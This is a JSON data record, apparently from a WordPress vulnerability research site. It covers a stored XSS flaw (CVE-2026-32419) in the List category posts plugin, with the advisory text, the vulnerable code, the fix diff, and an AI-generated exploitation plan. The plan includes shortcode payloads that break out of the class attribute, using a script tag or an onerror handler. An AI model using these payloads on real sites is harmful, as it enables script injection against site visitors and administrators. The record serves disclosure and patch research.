[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fzZ-xWzAR2Al_b4VUMuwxpdprAvDDYW1H_wsST4cNJyQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":28,"research_verified":29,"research_rounds_completed":30,"research_plan":31,"research_summary":32,"research_vulnerable_code":33,"research_fix_diff":34,"research_exploit_outline":35,"research_model_used":36,"research_started_at":37,"research_completed_at":38,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":29,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":29,"source_links":39},"CVE-2026-32419","list-category-posts-authenticated-author-stored-cross-site-scripting-2","List category posts \u003C= 0.93.1 - Authenticated (Author+) Stored Cross-Site Scripting","The List category posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 0.93.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","list-category-posts",null,"\u003C=0.93.1","0.94.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-26 00:00:00","2026-04-15 21:01:19",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F5ebda2ba-c24f-4f40-8f67-341dacaf907a?source=api-prod",49,[22,23,24,25,26,27],"CHANGELOG.md","include\u002Flcp-catlist.php","include\u002Flcp-paginator.php","include\u002Flcp-thumbnail.php","list-category-posts.php","readme.txt","researched",false,3,"# Exploitation Research Plan: CVE-2026-32419 (List category posts \u003C= 0.93.1)\n\n## 1. Vulnerability Summary\nThe **List category posts** plugin is vulnerable to **Stored Cross-Site Scripting (XSS)** via the `[catlist]` shortcode. Specifically, the `thumbnail_class` parameter is improperly neutralized before being concatenated into the HTML output within the `LcpThumbnail` class. Authenticated users with **Author** privileges (or higher) can use the shortcode in post content to inject arbitrary JavaScript that executes when any user views the post.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: WordPress post\u002Fpage editor (standard content creation).\n- **Vulnerable Component**: The `[catlist]` shortcode processing logic.\n- **Vulnerable Parameter**: `thumbnail_class` attribute within the shortcode.\n- **Authentication Level**: **Author** (can create and publish posts).\n- **Sinks**: `include\u002Flcp-thumbnail.php` - `get_thumbnail()` and `check_youtube_thumbnail()` functions.\n\n## 3. Code Flow\n1. **Entry Point**: A user creates or edits a post containing `[catlist thumbnail_class='...']`.\n2. **Shortcode Registration**: `list-category-posts.php` registers the shortcode:\n ```php\n add_shortcode( 'catlist', array('ListCategoryPosts', 'catlist_func') );\n ```\n3. **Processing**: `catlist_func()` instantiates `CatListDisplayer`, which uses the `CatList` class to query posts.\n4. **Display Logic**: `CatListDisplayer` iterates through the results and calls `LcpThumbnail::get_instance()->get_thumbnail()`, passing the `thumbnail_class` parameter.\n5. **The Sink (Manual HTML Concatenation)**: In `include\u002Flcp-thumbnail.php`, within the `get_thumbnail()` function (line 62):\n ```php\n } else if ( ($force_thumbnail === 'yes'|| $force_thumbnail === 'true') && preg_match('~\u003Cimg[^>]*src\\s?=\\s?[\\'\"]([^\\'\"]*)~i',get_the_content(), $imgMatches)) {\n \u002F\u002F ...\n if ( $lcp_thumb_class != null ) { \u002F\u002F thumbnail class passed as parameter to shortcode\n $lcp_thumbnail .= 'class=\"' . $lcp_thumb_class . '\" '; \u002F\u002F \u003C--- VULNERABLE SINK\n }\n ```\n The variable `$lcp_thumb_class` is directly appended to the `$lcp_thumbnail` string without `esc_attr()` or any other sanitization.\n\n## 4. Nonce Acquisition Strategy\nThis is a **Stored XSS** in post content. No specific plugin-defined AJAX nonces are required to execute the attack. The attacker simply needs to be able to save\u002Fpublish a post. Standard WordPress `_wpnonce` protection for the post editor will be handled by the user's session when using the browser or `wp-cli`.\n\n## 5. Exploitation Strategy\n\n### Step 1: Prepare Target Content\nThe vulnerable code path in `get_thumbnail` requires `force_thumbnail=yes` and a post that does **not** have a featured image but **does** contain an `\u003Cimg>` tag in its content.\n\n### Step 2: Inject Payload\nThe Author will create a post containing the following shortcode:\n`[catlist id=1 thumbnail=yes force_thumbnail=yes thumbnail_class='\">\u003Cscript>alert(window.origin)\u003C\u002Fscript>']`\n\n### Step 3: Execution\nWhen the page is rendered:\n1. The plugin searches for posts in Category 1.\n2. It finds the \"Target Post\" (which has an image in its content but no featured image).\n3. It reaches the vulnerable `else if` block in `include\u002Flcp-thumbnail.php`.\n4. It constructs an `\u003Cimg>` tag: `\u003Cimg src=\"URL\" class=\"\">\u003Cscript>alert(window.origin)\u003C\u002Fscript> \" alt=\"...\" \u002F>`.\n5. The script executes in the browser of anyone viewing the post.\n\n## 6. Test Data Setup\n1. **Create Author User**:\n ```bash\n wp user create attacker attacker@example.com --role=author --user_pass=password123\n ```\n2. **Create Target Post** (in Category 1, typically \"Uncategorized\"):\n ```bash\n wp post create --post_title=\"Target Post\" --post_content='Look at this image: \u003Cimg src=\"https:\u002F\u002Fexample.com\u002Fsample.jpg\">' --post_status=publish --post_category=1\n ```\n3. **Create Malicious Post** (as Author):\n ```bash\n # Note: Using the http_request tool or browser_navigate to simulate Author activity\n ```\n\n## 7. Expected Results\n- The HTTP response for the malicious post's URL should contain the raw payload: `class=\"\">\u003Cscript>alert(window.origin)\u003C\u002Fscript>`.\n- When viewed in a browser, a JavaScript alert window showing the origin should appear.\n\n## 8. Verification Steps\n1. **Inspect HTML**:\n Use `http_request` to fetch the post and check for the injected script.\n ```javascript\n const response = await http_request.get(\"http:\u002F\u002Flocalhost:8080\u002F?p=[POST_ID]\");\n if (response.body.includes('class=\"\">\u003Cscript>alert(window.origin)\u003C\u002Fscript>')) {\n console.log(\"XSS Verified\");\n }\n ```\n2. **Check Plugin Version**:\n ```bash\n wp plugin get list-category-posts --field=version\n ```\n\n## 9. Alternative Approaches\nIf `force_thumbnail` is not used, the `check_youtube_thumbnail()` function in `include\u002Flcp-thumbnail.php` is also vulnerable via a similar pattern:\n```php\nif ($lcp_thumb_class != null){\n $thmbn_class = ' class=\"' . $lcp_thumb_class . '\" \u002F>';\n $lcp_ytimage = preg_replace(\"\u002F\\>\u002F\", $thmbn_class, $lcp_ytimage);\n}\n```\n**Alternative Payload**:\n1. Create a post with a YouTube link: `https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=dQw4w9WgXcQ`.\n2. Use shortcode: `[catlist thumbnail=yes thumbnail_class=' x\" onerror=\"alert(1)\"']`.\n3. The `preg_replace` will result in: `\u003Cimg src=\"...\" class=\" x\" onerror=\"alert(1)\"\" alt=\"...\" \u002F>`.","The List category posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the [catlist] shortcode. This occurs because the 'thumbnail_class' attribute is improperly sanitized and escaped before being included in the generated HTML for post thumbnails. Authenticated attackers with Author-level permissions or higher can exploit this to inject arbitrary JavaScript that executes in the browser of any user viewing the affected post or page.","\u002F\u002F include\u002Flcp-thumbnail.php lines 59-62\n $lcp_thumbnail .= '\u003Cimg src=\"' . esc_url($imgMatches[1]) . '\" ';\n if ( $lcp_thumb_class != null ) { \u002F\u002F thumbnail class passed as parameter to shortcode\n $lcp_thumbnail .= 'class=\"' . $lcp_thumb_class . '\" ';\n }\n\n---\n\n\u002F\u002F include\u002Flcp-thumbnail.php lines 98-102\n if ($lcp_thumb_class != null){\n $thmbn_class = ' class=\"' . $lcp_thumb_class . '\" \u002F>';\n $lcp_ytimage = preg_replace(\"\u002F\\>\u002F\", $thmbn_class, $lcp_ytimage);\n }","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Flist-category-posts\u002F0.93.1\u002Finclude\u002Flcp-thumbnail.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Flist-category-posts\u002F0.94.0\u002Finclude\u002Flcp-thumbnail.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Flist-category-posts\u002F0.93.1\u002Finclude\u002Flcp-thumbnail.php\t2024-01-08 10:06:40.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Flist-category-posts\u002F0.94.0\u002Finclude\u002Flcp-thumbnail.php\t2026-02-16 20:33:42.000000000 +0000\n@@ -58,7 +58,7 @@\n \n $lcp_thumbnail .= '\u003Cimg src=\"' . esc_url($imgMatches[1]) . '\" ';\n if ( $lcp_thumb_class != null ) { \u002F\u002F thumbnail class passed as parameter to shortcode\n- $lcp_thumbnail .= 'class=\"' . $lcp_thumb_class . '\" ';\n+ $lcp_thumbnail .= 'class=\"' . LcpUtils::sanitize_html_classes($lcp_thumb_class) . '\" ';\n }\n else { \u002F\u002F Otherwise, use this class name\n $lcp_thumbnail .= 'class=\"lcp_thumbnail\" ';\n@@ -74,7 +74,6 @@\n \n private function check_youtube_thumbnail($single, $lcp_thumb_class){\n $content = $single->content;\n- \n # youtube.com\u002Fwatch?v=id\n $yt_pattern = '\u002F([a-zA-Z0-9\\-\\_]+\\.|)youtube\\.com\\\u002Fwatch(\\?v\\=|\\\u002Fv\\\u002F)([a-zA-Z0-9\\-\\_]{11})([^\u003C\\s]*)\u002F';\n # youtube.com\u002Fv[id]\n@@ -96,7 +95,7 @@\n $lcp_ytimage = '\u003Cimg src=\"' . $imageurl . '\" alt=\"' . $single->post_title . '\" \u002F>';\n \n if ($lcp_thumb_class != null){\n- $thmbn_class = ' class=\"' . $lcp_thumb_class . '\" \u002F>';\n+ $thmbn_class = ' class=\"' . LcpUtils::sanitize_html_classes($lcp_thumb_class) . '\" \u002F>';\n $lcp_ytimage = preg_replace(\"\u002F\\>\u002F\", $thmbn_class, $lcp_ytimage);\n }\n return '\u003Ca href=\"' . get_permalink($single->ID).'\">' . $lcp_ytimage . '\u003C\u002Fa>';","1. Gain Author-level authentication on the WordPress site.\n2. Create a post that will serve as the target for the shortcode. This post should either contain an \u003Cimg> tag in its content (if using force_thumbnail) or a YouTube link (if exploiting the check_youtube_thumbnail path).\n3. Create a second post or page containing the [catlist] shortcode.\n4. Within the shortcode, use the 'thumbnail_class' attribute to inject an XSS payload. For example: `[catlist thumbnail=yes force_thumbnail=yes thumbnail_class='\">\u003Cscript>alert(origin)\u003C\u002Fscript>']`.\n5. Publish the post. When any user (including an Administrator) views the page, the plugin will render the thumbnail for the target post, injecting the unsanitized class string directly into the HTML \u003Cimg> tag and executing the JavaScript payload.","gemini-3-flash-preview","2026-04-18 23:24:35","2026-04-18 23:25:09",{"type":40,"vulnerable_version":41,"fixed_version":11,"vulnerable_browse":42,"vulnerable_zip":43,"fixed_browse":44,"fixed_zip":45,"all_tags":46},"plugin","0.93.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flist-category-posts\u002Ftags\u002F0.93.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flist-category-posts.0.93.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flist-category-posts\u002Ftags\u002F0.94.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flist-category-posts.0.94.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flist-category-posts\u002Ftags"]